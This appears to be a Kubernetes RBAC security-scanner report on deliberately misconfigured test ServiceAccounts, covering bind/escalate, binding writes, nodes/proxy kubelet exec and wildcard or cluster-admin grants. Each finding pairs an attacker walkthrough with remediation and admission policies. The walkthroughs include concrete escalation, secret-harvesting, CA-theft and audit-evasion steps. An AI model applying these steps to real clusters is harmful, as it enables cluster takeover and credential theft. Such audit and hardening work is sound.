RBAC has a guardrail: you can only grant permissions you yourself hold. Two verbs override that guardrail: bind (on a Role/ClusterRole) and escalate (also on Roles). Holding either lets the attacker create a binding to a Role they don't have themselves, including cluster-admin.

Scope matters. Granted by a ClusterRoleBinding the reach is cluster-wide; granted by a RoleBinding it bounds the bypass to the binding's namespace — namespace-admin instead of cluster-admin, but still a complete takeover of every workload, Secret, and ConfigMap in that namespace.
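To make the self-grant concrete, the binding created in step 2 of the walkthrough below is nothing more exotic than the following sketch; the binding name is deliberately bland, and the subject is this finding's ServiceAccount:

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  # An innocuous name makes the grant easy to miss in a quick review.
  name: cluster-monitor-binding
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
- kind: ServiceAccount
  name: sa-bind-escalate
  namespace: rbac-fixtures

With the bind verb in hand, the escalation guard accepts this object even though its creator does not hold cluster-admin themselves.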

  1. Attacker confirms the verb with kubectl auth can-i bind clusterroles --as=sa-bind-escalate -A.
  2. They write a one-line ClusterRoleBinding from their identity (or a SA they control) to the cluster-admin ClusterRole and kubectl apply it.
  3. They re-use the same token (ClusterRoleBindings take effect immediately on next request) and have full cluster control.
  4. Alternatively, with escalate on clusterroles, they kubectl edit clusterrole/<role-they-already-have> and add * verbs/resources/apiGroups, retaining the same binding.
  5. They optionally name the new ClusterRoleBinding innocuously (e.g. cluster-monitor-binding) so the change is less visible to operators reviewing kubectl get clusterrolebindings.
Remediation
Remove bind and escalate from non-admin identities; gate any legitimate need behind admission policy that rejects bindings to cluster-admin or system roles.
  1. Audit every Role/ClusterRole that includes bind or escalate with kubectl get clusterroles,roles -A -o json | jq '.items[] | select(.rules[]?.verbs[]? | IN("bind","escalate"))'.
  2. Remove the verbs from this Role/ClusterRole. If operators legitimately need them (Argo CD, Crossplane, OperatorHub), scope bind with resourceNames to a list of low-privilege ClusterRoles.
  3. Add a ValidatingAdmissionPolicy (or Kyverno) that rejects creation of any ClusterRoleBinding referencing cluster-admin/admin/system:masters outside a tiny admin allowlist.
  4. Verify with kubectl auth can-i bind clusterroles --as=sa-bind-escalate -A and kubectl auth can-i escalate roles --as=sa-bind-escalate -A both returning no.
Evidence
Scope: Cluster
API groups: rbac.authorization.k8s.io
rbac.authorization.k8s.io: RBAC objects (write access is roughly cluster takeover)
Resources: roles, clusterroles
roles: Namespace-scoped RBAC rules
clusterroles: Cluster-scoped RBAC rules
Verbs: bind, escalate
bind: Bind any role to any subject
escalate: Grant rules beyond the caller's own permissions
Source role: cr-bind-escalate
Inspect: kubectl get clusterrole cr-bind-escalate -o yaml
Source binding: crb-bind-escalate
Inspect: kubectl get clusterrolebinding crb-bind-escalate -o yaml
Show raw JSON
{
  "api_groups": [
    "rbac.authorization.k8s.io"
  ],
  "namespace": "",
  "resources": [
    "roles",
    "clusterroles"
  ],
  "scope": "cluster",
  "source_binding": "crb-bind-escalate",
  "source_role": "cr-bind-escalate",
  "verbs": [
    "bind",
    "escalate"
  ]
}
CRITICAL

Cluster-wide write access to (Cluster)RoleBindings opens a self-grant path

KUBE-PRIVESC-010 2 subjects Score 10.0
MITRE ATT&CK: T1098 · T1078.004 · T1548

Affected subjects (2)

CRITICAL ServiceAccount/rbac-fixtures/sa-rolebinding-mutate Cluster 10.0
Cluster-wide write access to (Cluster)RoleBindings opens a self-grant path (ServiceAccount/rbac-fixtures/sa-rolebinding-mutate)
Scope · Cluster Cluster-wide: applies to every current and future namespace
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-rolebinding-mutate Resource: RBACRule/cr-rolebinding-mutate

Subject ServiceAccount/rbac-fixtures/sa-rolebinding-mutate can create/update/patch rolebindings/clusterrolebindings via ClusterRoleBinding crb-rolebinding-mutate → ClusterRole cr-rolebinding-mutate. Cluster-wide: applies to every current and future namespace.

RoleBinding write is the most direct self-grant path in Kubernetes. Even with the API-level escalation guard active (binding only to roles whose permissions you already have), this permission is dangerous: if the subject already holds any powerful permission (often inherited from a default ClusterRole like view/edit), they can re-bind it to backup identities for persistence.

A RoleBinding can also reference a ClusterRole, granting that ClusterRole's permissions inside the binding's namespace, so create rolebindings in kube-system is effectively cluster-admin-on-kube-system. Combined with bind on clusterroles (KUBE-PRIVESC-009), this bypasses the escalation guard entirely and yields cluster-admin in one step. Microsoft's Threat Matrix for Kubernetes documents this as the Cluster-admin binding technique.

Impact: Self-grant any role the subject already holds (or any ClusterRole, when paired with bind or when binding into namespaces); cluster-wide writes are one step from cluster-admin.
How an attacker abuses this
Background
Subject · ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
Technique · RoleBinding write access

create/update/patch on rolebindings or clusterrolebindings lets the attacker bind themselves to any role, typically cluster-admin. They don't need the role's permissions today, only the ability to change bindings.

Scope matters. Granted at cluster scope (via a ClusterRoleBinding, or with cluster-wide reach on rolebindings) the reach is cluster-admin equivalent. Granted by a RoleBinding the reach is bounded to that one namespace — full namespace-admin, but the bound ClusterRole's verbs apply only inside the binding's namespace.

  1. Attacker enumerates what they can already bind with kubectl auth can-i create clusterrolebindings --as=sa-rolebinding-mutate -A and kubectl auth can-i --list --as=sa-rolebinding-mutate -A.
  2. If they hold a useful role, they create a ClusterRoleBinding granting that role to a backup identity for persistence.
  3. With bind on cluster-admin (often via wildcards), they create a ClusterRoleBinding from themselves to cluster-admin.
  4. Even without bind, in kube-system they create a RoleBinding referencing system:controller:clusterrole-aggregation-controller (which has escalate baked in) and pivot from there.
  5. They name the binding innocuously (e.g. monitoring-readonly) so audit logs look benign.
Remediation
Restrict create/update/patch on rolebindings/clusterrolebindings to a small admin boundary; require all RBAC changes to flow through GitOps with PR review.
  1. Audit who has write access to RBAC bindings. Most workloads should have zero RBAC write rights.
  2. Remove the verbs entirely from this Role/ClusterRole, or scope them with resourceNames to a fixed list of binding names that the workload owns (see the sketch after these steps).
  3. Move RBAC management to GitOps (Argo CD/Flux) so binding changes require a PR. The GitOps controller should be the only identity with cluster-wide RBAC write access.
  4. Add a ValidatingAdmissionPolicy that rejects ClusterRoleBindings to high-risk ClusterRoles (cluster-admin, admin, anything matching *system:*) outside an approved admin allowlist.
  5. Verify with kubectl auth can-i create clusterrolebindings --as=sa-rolebinding-mutate -A returning no.
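A sketch of the resourceNames scoping from step 2, assuming the workload only ever reconciles one binding it owns; every name here is hypothetical:

apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: rolebinding-writer-scoped   # hypothetical
  namespace: app-namespace          # hypothetical
rules:
- apiGroups: ["rbac.authorization.k8s.io"]
  resources: ["rolebindings"]
  # create is omitted on purpose: RBAC cannot constrain create by resourceNames,
  # so only in-place changes to the one named binding are allowed.
  verbs: ["get", "update", "patch"]
  resourceNames: ["app-owned-binding"]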
Evidence
Scope: Cluster
API groups: rbac.authorization.k8s.io
rbac.authorization.k8s.io: RBAC objects (write access is roughly cluster takeover)
Resources: rolebindings, clusterrolebindings
rolebindings: Namespace-scoped RBAC grants
clusterrolebindings: Cluster-scoped RBAC grants
Verbs: create, update, patch
create: Create new objects of this resource
update: Replace existing objects
patch: Mutate existing objects in place
Source role: cr-rolebinding-mutate
Inspect: kubectl get clusterrole cr-rolebinding-mutate -o yaml
Source binding: crb-rolebinding-mutate
Inspect: kubectl get clusterrolebinding crb-rolebinding-mutate -o yaml
Show raw JSON
{
  "api_groups": [
    "rbac.authorization.k8s.io"
  ],
  "namespace": "",
  "resources": [
    "rolebindings",
    "clusterrolebindings"
  ],
  "scope": "cluster",
  "source_binding": "crb-rolebinding-mutate",
  "source_role": "cr-rolebinding-mutate",
  "verbs": [
    "create",
    "update",
    "patch"
  ]
}
CRITICAL ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate Namespace 10.0
Write access to (Cluster)RoleBindings in namespace rbac-ns-fixtures opens a self-grant path (ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate)
Scope · Namespace Namespace rbac-ns-fixtures only
Category: Privilege Escalation Subject: ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate Resource: RBACRule/rbac-ns-fixtures/r-ns-rolebinding-mutate

Subject ServiceAccount/rbac-ns-fixtures/sa-ns-rolebinding-mutate can create/update/patch rolebindings/clusterrolebindings via RoleBinding rbac-ns-fixtures/rb-ns-rolebinding-mutate → Role rbac-ns-fixtures/r-ns-rolebinding-mutate. Namespace rbac-ns-fixtures only.

RoleBinding write is the most direct self-grant path in Kubernetes. Even with the API-level escalation guard active (binding only to roles whose permissions you already have), this permission is dangerous: if the subject already holds any powerful permission (often inherited from a default ClusterRole like view/edit), they can re-bind it to backup identities for persistence.

A RoleBinding can also reference a ClusterRole, granting that ClusterRole's permissions inside the binding's namespace, so create rolebindings in kube-system is effectively cluster-admin-on-kube-system. Combined with bind on clusterroles (KUBE-PRIVESC-009), this bypasses the escalation guard entirely and yields cluster-admin in one step. Microsoft's Threat Matrix for Kubernetes documents this as the Cluster-admin binding technique.

Impact: Self-grant any role the subject already holds (or any ClusterRole, when paired with bind or when binding into namespaces); cluster-wide writes are one step from cluster-admin.
How an attacker abuses this
Background
Subject · ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
Technique · RoleBinding write access

create/update/patch on rolebindings or clusterrolebindings lets the attacker bind themselves to any role, typically cluster-admin. They don't need the role's permissions today, only the ability to change bindings.

Scope matters. Granted at cluster scope (via a ClusterRoleBinding, or with cluster-wide reach on rolebindings) the reach is cluster-admin equivalent. Granted by a RoleBinding the reach is bounded to that one namespace — full namespace-admin, but the bound ClusterRole's verbs apply only inside the binding's namespace.

  1. Attacker enumerates what they can already bind with kubectl auth can-i create clusterrolebindings --as=sa-ns-rolebinding-mutate -n rbac-ns-fixtures and kubectl auth can-i --list --as=sa-ns-rolebinding-mutate -n rbac-ns-fixtures.
  2. If they hold a useful role, they create a ClusterRoleBinding granting that role to a backup identity for persistence.
  3. With bind on cluster-admin (often via wildcards), they create a ClusterRoleBinding from themselves to cluster-admin.
  4. Even without bind, in kube-system they create a RoleBinding referencing system:controller:clusterrole-aggregation-controller (which has escalate baked in) and pivot from there.
  5. They name the binding innocuously (e.g. monitoring-readonly) so audit logs look benign.
Remediation
Restrict create/update/patch on rolebindings/clusterrolebindings to a small admin boundary; require all RBAC changes to flow through GitOps with PR review.
  1. Audit who has write access to RBAC bindings. Most workloads should have zero RBAC write rights.
  2. Remove the verbs entirely from this Role/ClusterRole, or scope them with resourceNames to a fixed list of binding names that the workload owns.
  3. Move RBAC management to GitOps (Argo CD/Flux) so binding changes require a PR. The GitOps controller should be the only identity with cluster-wide RBAC write access.
  4. Add a ValidatingAdmissionPolicy that rejects ClusterRoleBindings to high-risk ClusterRoles (cluster-admin, admin, anything matching *system:*) outside an approved admin allowlist.
  5. Verify with kubectl auth can-i create clusterrolebindings --as=sa-ns-rolebinding-mutate -n rbac-ns-fixtures returning no.
Evidence
Scope: Namespace
Namespace: rbac-ns-fixtures
API groups: rbac.authorization.k8s.io
rbac.authorization.k8s.io: RBAC objects (write access is roughly cluster takeover)
Resources: rolebindings
rolebindings: Namespace-scoped RBAC grants
Verbs: create, update, patch
create: Create new objects of this resource
update: Replace existing objects
patch: Mutate existing objects in place
Source role: r-ns-rolebinding-mutate
Inspect: kubectl get role r-ns-rolebinding-mutate -n rbac-ns-fixtures -o yaml
Source binding: rb-ns-rolebinding-mutate
Inspect: kubectl get rolebinding rb-ns-rolebinding-mutate -n rbac-ns-fixtures -o yaml
Show raw JSON
{
  "api_groups": [
    "rbac.authorization.k8s.io"
  ],
  "namespace": "rbac-ns-fixtures",
  "resources": [
    "rolebindings"
  ],
  "scope": "namespace",
  "source_binding": "rb-ns-rolebinding-mutate",
  "source_role": "r-ns-rolebinding-mutate",
  "verbs": [
    "create",
    "update",
    "patch"
  ]
}
CRITICAL

get nodes/proxy enables kubelet exec via API server

KUBE-PRIVESC-012 1 subject Score 10.0
MITRE ATT&CK: T1609 · T1611 · T1078.004 · T1610

Affected subject

CRITICAL ServiceAccount/rbac-fixtures/sa-nodes-proxy Cluster 10.0
get nodes/proxy enables kubelet exec via API server (ServiceAccount/rbac-fixtures/sa-nodes-proxy)
Scope · Cluster Cluster-wide kubelet API on every node (nodes is cluster-scoped)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-nodes-proxy Resource: RBACRule/cr-nodes-proxy

Subject ServiceAccount/rbac-fixtures/sa-nodes-proxy can get nodes/proxy via ClusterRoleBinding crb-nodes-proxy → ClusterRole cr-nodes-proxy. Despite the read-only-sounding get verb, this permission lets the holder execute arbitrary commands inside any pod on any node by tunneling through the API server to the kubelet's internal HTTP API: /exec, /run, /attach, /portforward.

The technical root cause: pod exec uses an HTTP-to-WebSocket upgrade. The API server authorizes the upgrade based on the initial GET against the proxy subresource, not against pods/exec. So a subject with get nodes/proxy can issue kubectl get --raw '/api/v1/nodes/<node>/proxy/exec/...' and end up with an interactive shell in any container, even with no pods/exec permission anywhere.

Worse, the resulting commands execute over a direct API-server-to-kubelet WebSocket and are NOT recorded in apiserver audit logs at the objectRef/verb granularity. The audit log shows only the proxy GET. Detection requires node-level eBPF/process monitoring (Falco, Tetragon, KubeArmor), not API-server logs alone. Kubernetes issue #119640 and Stream Security have published proof-of-concept exploits.

Impact: Cluster-wide remote code execution: exec into any container on any node via the kubelet API, with execution invisible to standard apiserver audit logs.
How an attacker abuses this
Background
Subject · ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
Technique · nodes/proxy → kubelet API

The nodes/proxy subresource forwards requests to the kubelet on each node. Combined with kubelet's /exec endpoint and a WebSocket verb mismatch, this becomes a primitive for executing commands inside any pod the kubelet can reach.

  1. Attacker confirms the verb with kubectl auth can-i get nodes/proxy --as=sa-nodes-proxy -A.
  2. They list nodes (kubectl get nodes) and pick a high-value one, typically a control-plane node or any node hosting kube-apiserver/etcd/operator pods.
  3. They issue an exec request via the proxy endpoint, e.g. kubectl get --raw '/api/v1/nodes/<node>/proxy/run/kube-system/<pod>/<container>?cmd=id', or open a WebSocket to /exec.
  4. They land in the target container with that container's privileges (host-mounts, capabilities, ServiceAccount token).
  5. From a control-plane container they read /etc/kubernetes/pki/admin.conf for cluster-admin credentials. The entire chain leaves no pods/exec audit entries.
Remediation
Remove nodes/proxy from this subject; reserve it for the API server itself and a tiny set of trusted operators that document this need.
  1. Remove the rule entirely. Application workloads never need nodes/proxy; Kubernetes documents this as a 'severe escalation hazard' in RBAC Good Practices.
  2. If a monitoring/observability stack genuinely requires it, migrate to the nodes/metrics and nodes/stats subresources, which expose telemetry without the exec endpoints (see the sketch after these steps).
  3. Deploy node-level runtime monitoring (Falco, Tetragon, KubeArmor) to detect kubelet /exec, /run, /attach usage at the kernel level.
  4. Verify with kubectl auth can-i get nodes/proxy --as=sa-nodes-proxy -A returning no. Test the high-impact case with kubectl get --raw '/api/v1/nodes/<node>/proxy/run/...' returning 403.
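A sketch of the telemetry-only alternative from step 2: a ClusterRole for a monitoring agent that keeps node metrics readable while never granting nodes/proxy. The role name is hypothetical.

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: node-telemetry-reader   # hypothetical
rules:
- apiGroups: [""]
  resources: ["nodes"]
  verbs: ["get", "list", "watch"]
- apiGroups: [""]
  # Telemetry subresources only; nodes/proxy, which fronts the kubelet
  # exec/run/attach endpoints, is deliberately absent.
  resources: ["nodes/metrics", "nodes/stats"]
  verbs: ["get"]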
Evidence
Scope: Cluster
API groups: core/v1
Resources: nodes/proxy
nodes/proxy: Direct kubelet access (bypasses API server authz)
Verbs: get
Source role: cr-nodes-proxy
Inspect: kubectl get clusterrole cr-nodes-proxy -o yaml
Source binding: crb-nodes-proxy
Inspect: kubectl get clusterrolebinding crb-nodes-proxy -o yaml
Show raw JSON
{
  "api_groups": [
    ""
  ],
  "namespace": "",
  "resources": [
    "nodes/proxy"
  ],
  "scope": "cluster",
  "source_binding": "crb-nodes-proxy",
  "source_role": "cr-nodes-proxy",
  "verbs": [
    "get"
  ]
}
CRITICAL

Cluster-wide wildcard RBAC permissions on ServiceAccount/rbac-fixtures/sa-cluster-admin

KUBE-PRIVESC-017 2 subjects Score 10.0

Affected subjects (2)

CRITICAL ServiceAccount/rbac-fixtures/sa-cluster-admin Cluster 10.0
Cluster-wide wildcard RBAC permissions on ServiceAccount/rbac-fixtures/sa-cluster-admin
Scope · Cluster Cluster-wide: applies to every current and future namespace
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-cluster-admin Resource: RBACRule/cluster-admin

RBAC rule from ClusterRoleBinding crb-cluster-admin → ClusterRole cluster-admin grants * verbs on * resources in * apiGroups to ServiceAccount/rbac-fixtures/sa-cluster-admin. Cluster-wide: applies to every current and future namespace.

Wildcards are dangerous beyond their current expansion: any resource type added later (CRDs, new core subresources, future verbs) is automatically granted to this subject without anyone reviewing the change. The Kubernetes project explicitly flags this in RBAC Good Practices as an anti-pattern.

In a typical attack, an adversary who reaches a workload bound to this rule has full control: they read every Secret, create privileged pods on any node, bind themselves to additional ClusterRoles, and persist by minting long-lived tokens via the TokenRequest API. There is no further escalation needed. The box is already at the top.

Impact: Full control cluster-wide: read/write every Secret, RBAC object, Pod, and Node; equivalent to cluster-admin when cluster-scoped.
How an attacker abuses this
Background
Subject · ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
Technique · Wildcard verbs × wildcard resources

An RBAC rule with verbs: ["*"], resources: ["*"], and apiGroups: ["*"] is functionally identical to cluster-admin, even if it isn't called that. Often introduced by careless Helm charts or "give it permission to everything until it works" debugging.

  1. Attacker compromises a workload that resolves to ServiceAccount/rbac-fixtures/sa-cluster-admin (vulnerable container image, supply-chain backdoor, or stolen kubeconfig).
  2. They run kubectl auth can-i '*' '*' --as=sa-cluster-admin -A and confirm wildcard permissions.
  3. They list every Secret in scope (kubectl get secrets -A -o yaml) to harvest cloud-provider credentials, registry pull secrets, and other ServiceAccount tokens.
  4. They create a privileged DaemonSet that mounts the host filesystem and reads /etc/kubernetes/pki/* to steal the cluster CA.
  5. They establish persistence by minting a long-lived token for clusterrole-aggregation-controller via the TokenRequest API, then optionally remove their original binding to evade detection.
Remediation
Replace the wildcard rule with an explicit allowlist of (apiGroups, resources, verbs) limited to what the workload actually calls.
  1. Inventory what ServiceAccount/rbac-fixtures/sa-cluster-admin actually needs. Run kubectl auth can-i --list --as=sa-cluster-admin -A and correlate with audit logs filtered on user.username.
  2. Author a least-privilege Role/ClusterRole listing only those (apiGroups, resources, verbs); drop every wildcard (see the sketch after these steps). Prefer namespace-scoped Role+RoleBinding over ClusterRole+ClusterRoleBinding wherever possible.
  3. Apply the new binding, delete the wildcard binding ClusterRoleBinding crb-cluster-admin, and verify with kubectl auth can-i '*' '*' --as=sa-cluster-admin -A returning no.
  4. Add a ValidatingAdmissionPolicy (or Kyverno/OPA Gatekeeper rule) that rejects any future Role/ClusterRole containing * in verbs, resources, or apiGroups.
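Purely as an illustration of the shape of step 2 (the real rule list must come from the step 1 inventory, so every group, resource, and verb below is hypothetical), a least-privilege replacement enumerates exactly what the workload calls instead of wildcards:

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: sa-cluster-admin-least-privilege   # hypothetical
rules:
- apiGroups: [""]
  resources: ["pods", "configmaps"]
  verbs: ["get", "list", "watch"]
- apiGroups: ["apps"]
  resources: ["deployments"]
  verbs: ["get", "list", "watch", "patch"]

No entry uses *, so resources added to the cluster later are not silently granted.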
Evidence
Scope: Cluster
API groups: *
*: Wildcard: every API group
Resources: *
*: Wildcard: every resource
Verbs: *
*: Wildcard: every verb (get, list, create, update, delete, …)
Source role: cluster-admin
Inspect: kubectl get clusterrole cluster-admin -o yaml
Source binding: crb-cluster-admin
Inspect: kubectl get clusterrolebinding crb-cluster-admin -o yaml
Show raw JSON
{
  "api_groups": [
    "*"
  ],
  "namespace": "",
  "resources": [
    "*"
  ],
  "scope": "cluster",
  "source_binding": "crb-cluster-admin",
  "source_role": "cluster-admin",
  "verbs": [
    "*"
  ]
}
CRITICAL ServiceAccount/rbac-fixtures/sa-wildcard Cluster 10.0
Cluster-wide wildcard RBAC permissions on ServiceAccount/rbac-fixtures/sa-wildcard
Scope · Cluster Cluster-wide: applies to every current and future namespace
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-wildcard Resource: RBACRule/cr-wildcard

RBAC rule from ClusterRoleBinding crb-wildcard → ClusterRole cr-wildcard grants * verbs on * resources in * apiGroups to ServiceAccount/rbac-fixtures/sa-wildcard. Cluster-wide: applies to every current and future namespace.

Wildcards are dangerous beyond their current expansion: any resource type added later (CRDs, new core subresources, future verbs) is automatically granted to this subject without anyone reviewing the change. The Kubernetes project explicitly flags this in RBAC Good Practices as an anti-pattern.

In a typical attack, an adversary who reaches a workload bound to this rule has full control: they read every Secret, create privileged pods on any node, bind themselves to additional ClusterRoles, and persist by minting long-lived tokens via the TokenRequest API. There is no further escalation needed. The box is already at the top.

Impact: Full control cluster-wide: read/write every Secret, RBAC object, Pod, and Node; equivalent to cluster-admin when cluster-scoped.
How an attacker abuses this
Background
Subject · ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
Technique · Wildcard verbs × wildcard resources

An RBAC rule with verbs: ["*"], resources: ["*"], and apiGroups: ["*"] is functionally identical to cluster-admin, even if it isn't called that. Often introduced by careless Helm charts or "give it permission to everything until it works" debugging.

  1. Attacker compromises a workload that resolves to ServiceAccount/rbac-fixtures/sa-wildcard (vulnerable container image, supply-chain backdoor, or stolen kubeconfig).
  2. They run kubectl auth can-i '*' '*' --as=sa-wildcard -A and confirm wildcard permissions.
  3. They list every Secret in scope (kubectl get secrets -A -o yaml) to harvest cloud-provider credentials, registry pull secrets, and other ServiceAccount tokens.
  4. They create a privileged DaemonSet that mounts the host filesystem and reads /etc/kubernetes/pki/* to steal the cluster CA.
  5. They establish persistence by minting a long-lived token for clusterrole-aggregation-controller via the TokenRequest API, then optionally remove their original binding to evade detection.
Remediation
Replace the wildcard rule with an explicit allowlist of (apiGroups, resources, verbs) limited to what the workload actually calls.
  1. Inventory what ServiceAccount/rbac-fixtures/sa-wildcard actually needs. Run kubectl auth can-i --list --as=sa-wildcard -A and correlate with audit logs filtered on user.username.
  2. Author a least-privilege Role/ClusterRole listing only those (apiGroups, resources, verbs); drop every wildcard. Prefer namespace-scoped Role+RoleBinding over ClusterRole+ClusterRoleBinding wherever possible.
  3. Apply the new binding, delete the wildcard binding ClusterRoleBinding crb-wildcard, and verify with kubectl auth can-i '*' '*' --as=sa-wildcard -A returning no.
  4. Add a ValidatingAdmissionPolicy (or Kyverno/OPA Gatekeeper rule) that rejects any future Role/ClusterRole containing * in verbs, resources, or apiGroups.
Evidence
Scope: Cluster
API groups: *
*: Wildcard: every API group
Resources: *
*: Wildcard: every resource
Verbs: *
*: Wildcard: every verb (get, list, create, update, delete, …)
Source role: cr-wildcard
Inspect: kubectl get clusterrole cr-wildcard -o yaml
Source binding: crb-wildcard
Inspect: kubectl get clusterrolebinding crb-wildcard -o yaml
Show raw JSON
{
  "api_groups": [
    "*"
  ],
  "namespace": "",
  "resources": [
    "*"
  ],
  "scope": "cluster",
  "source_binding": "crb-wildcard",
  "source_role": "cr-wildcard",
  "verbs": [
    "*"
  ]
}
CRITICAL

Non-system subject ServiceAccount/rbac-fixtures/sa-cluster-admin directly bound to cluster-admin

KUBE-RBAC-OVERBROAD-001 1 subject Score 10.0
MITRE ATT&CK: T1078 · T1078.004 · T1098 · T1548

Affected subject

CRITICAL ServiceAccount/rbac-fixtures/sa-cluster-admin Cluster 10.0
Non-system subject ServiceAccount/rbac-fixtures/sa-cluster-admin directly bound to cluster-admin
Scope · Cluster Cluster-wide cluster-admin (full read/write to every resource in every namespace)
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-cluster-admin Resource: RBACRule/cluster-admin

Subject ServiceAccount/rbac-fixtures/sa-cluster-admin is directly bound to the built-in cluster-admin ClusterRole via the ClusterRoleBinding crb-cluster-admin. The cluster-admin ClusterRole grants * on * resources in * apiGroups, which means full read/write to every Kubernetes object: Secrets, RBAC, Nodes, Pods, and CRDs cluster-wide.

Microsoft's Threat Matrix for Kubernetes lists Cluster-admin binding as a top-tier privilege-escalation technique, and CIS Kubernetes Benchmark control 5.1.1 ('Ensure that the cluster-admin role is only used where required') is one of the foundational RBAC hardening checks. Common anti-patterns that produce this finding: kubectl create clusterrolebinding admin-binding --clusterrole=cluster-admin --user=alice@example.com for a developer; Helm charts that ship a default ClusterRoleBinding to cluster-admin; SaaS/operator installers that take the lazy path.

An attacker who compromises ServiceAccount/rbac-fixtures/sa-cluster-admin (stolen kubeconfig, vulnerable container, supply-chain backdoor, or OIDC token replay) immediately holds full cluster control with zero lateral movement required.

Impact: Full cluster control: read/write every resource cluster-wide, mint any token, modify any binding, schedule on any node. Equivalent to root on the entire cluster.
How an attacker abuses this
Background
Subject · ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
Technique · Direct cluster-admin binding

The subject is bound directly to the cluster-admin ClusterRole through a ClusterRoleBinding. No chain is needed; they are already cluster-admin. The only question is whether the subject itself can be compromised.

  1. Attacker compromises ServiceAccount/rbac-fixtures/sa-cluster-admin (stolen kubeconfig, OIDC session hijack, leaked CI credential, or compromised pod mounting the SA token).
  2. They run kubectl auth can-i '*' '*' --all-namespaces and confirm yes.
  3. They harvest all Secrets cluster-wide for cloud-credential pivot.
  4. They establish persistence by minting a 1-year TokenRequest for kube-system/clusterrole-aggregation-controller, or by creating a benign-looking ClusterRoleBinding to a backup identity.
  5. They use cluster-admin to disable audit logging or admission controllers, then move quietly through cloud APIs via IRSA/Workload-Identity-mapped credentials.
Remediation
Replace cluster-admin with a custom least-privilege ClusterRole, or scope the binding to a dedicated short-lived admin group reachable only via JIT/break-glass procedures.
  1. Identify what the subject actually does. Audit logs over a representative window will show the real verbs and resources for workloads; for human users, ask the team.
  2. Author a custom ClusterRole listing only the (apiGroups, resources, verbs) actually needed. Replace the binding to point at the new ClusterRole. Bias toward namespace-scoped Role + RoleBinding wherever possible.
  3. For genuine emergency-admin needs, move to a break-glass model: a separate cluster-admin-jit group reachable only via approved JIT (AWS SSO, GCP IAP, HashiCorp Boundary) with mandatory MFA, time-boxed expiry, and SIEM alerting.
  4. Add a ValidatingAdmissionPolicy that rejects new ClusterRoleBindings to cluster-admin outside the break-glass group (a sketch follows these steps).
  5. Verify: kubectl get clusterrolebindings -o json | jq '.items[] | select(.roleRef.name=="cluster-admin") | .subjects' shows only break-glass principals and system: subjects.
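A minimal sketch of the admission policy from step 4, assuming ValidatingAdmissionPolicy (admissionregistration.k8s.io/v1) is available in this cluster version and reusing the cluster-admin-jit break-glass group named above; object names are illustrative:

apiVersion: admissionregistration.k8s.io/v1
kind: ValidatingAdmissionPolicy
metadata:
  name: block-cluster-admin-bindings   # hypothetical
spec:
  failurePolicy: Fail
  matchConstraints:
    resourceRules:
    - apiGroups: ["rbac.authorization.k8s.io"]
      apiVersions: ["v1"]
      operations: ["CREATE", "UPDATE"]
      resources: ["clusterrolebindings"]
  validations:
  # Allow the binding only if it does not target cluster-admin, or the requester
  # is in the break-glass group.
  - expression: "object.roleRef.name != 'cluster-admin' || request.userInfo.groups.exists(g, g == 'cluster-admin-jit')"
    message: "ClusterRoleBindings to cluster-admin are reserved for the break-glass group."
---
apiVersion: admissionregistration.k8s.io/v1
kind: ValidatingAdmissionPolicyBinding
metadata:
  name: block-cluster-admin-bindings   # hypothetical
spec:
  policyName: block-cluster-admin-bindings
  validationActions: ["Deny"]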
Evidence
Scope: Cluster
Source role: cluster-admin
